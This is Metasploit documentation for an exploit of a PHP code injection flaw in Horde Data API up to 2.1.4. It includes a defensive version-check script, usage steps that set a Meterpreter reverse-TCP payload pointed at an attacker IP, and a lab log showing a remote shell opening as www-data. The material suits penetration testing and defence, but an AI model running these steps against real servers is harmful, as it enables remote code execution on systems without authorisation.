metasploit-gs/documentation/modules/exploit/multi/http/horde_csv_rce.md

Vulnerable Application

The Horde project comprises several standalone applications and libraries. The Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default. Among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. Versions of this library up to and including 2.1.4 are vulnerable to PHP code injection.

Find more information in the original advisory.
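
A defender-side check for the affected range stated above, added here as an example and not part of the module or the Horde project: it reads `pear list` style output and reports whether Horde_Data is at or below 2.1.4. The `pear list -c horde` invocation, the function names and the sample listing are assumptions (the listing is constructed).

```shell
#!/bin/sh
# Added example: classify the installed Horde_Data version from `pear list` output.
# Threshold from this page: versions up to and including 2.1.4 are vulnerable.
LAST_VULNERABLE="2.1.4"

# version_le A B: succeeds when dotted version A <= B, compared numerically
# per component (a plain string compare would rank 2.1.10 below 2.1.4).
version_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = x[i] + 0; yi = y[i] + 0   # missing components count as 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 0
    }'
}

# horde_data_status (hypothetical helper): reads `pear list` style output on
# stdin and prints vulnerable:<ver>, not-affected:<ver> or not-installed.
horde_data_status() {
    ver=$(awk 'tolower($1) == "horde_data" { print $2; exit }')
    if [ -z "$ver" ]; then
        echo "not-installed"
    elif version_le "$ver" "$LAST_VULNERABLE"; then
        echo "vulnerable:$ver"
    else
        echo "not-affected:$ver"
    fi
}

# Constructed sample of a package listing (not captured from a real host).
sample_listing() {
    printf '%s\n' \
        'Installed packages, channel pear.horde.org:' \
        '===========================================' \
        'Package     Version State' \
        'Horde_Core  2.31.10 stable' \
        "Horde_Data  $1   stable"
}

# On a live host (assumed invocation): pear list -c horde | horde_data_status
sample_listing 2.1.4 | horde_data_status
sample_listing 2.1.5 | horde_data_status
```
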

Verification Steps

  1. Install the application (see below)
  2. Start msfconsole
  3. Do: use exploit/multi/http/horde_csv_rce
  4. Do: set payload php/meterpreter/reverse_tcp
  5. Do: set lhost [ATTACKER IP]
  6. Do: set rhost [TARGET IP]
  7. Do: set username [username]
  8. Do: set password [password]
  9. Do: exploit
  10. A session should open

Downgrade the Horde Data API package if needed:

pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4

Scenarios

Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9

msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69
lhost => 192.168.1.69
msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69
rhost => 192.168.1.69
msf5 exploit(multi/http/horde_csv_rce) > set username alice
username => alice
msf5 exploit(multi/http/horde_csv_rce) > set password alice
password => alice
msf5 exploit(multi/http/horde_csv_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (38288 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:44524) at 2020-03-14 14:55:17 +0000

meterpreter > getuid
Server username: www-data (33)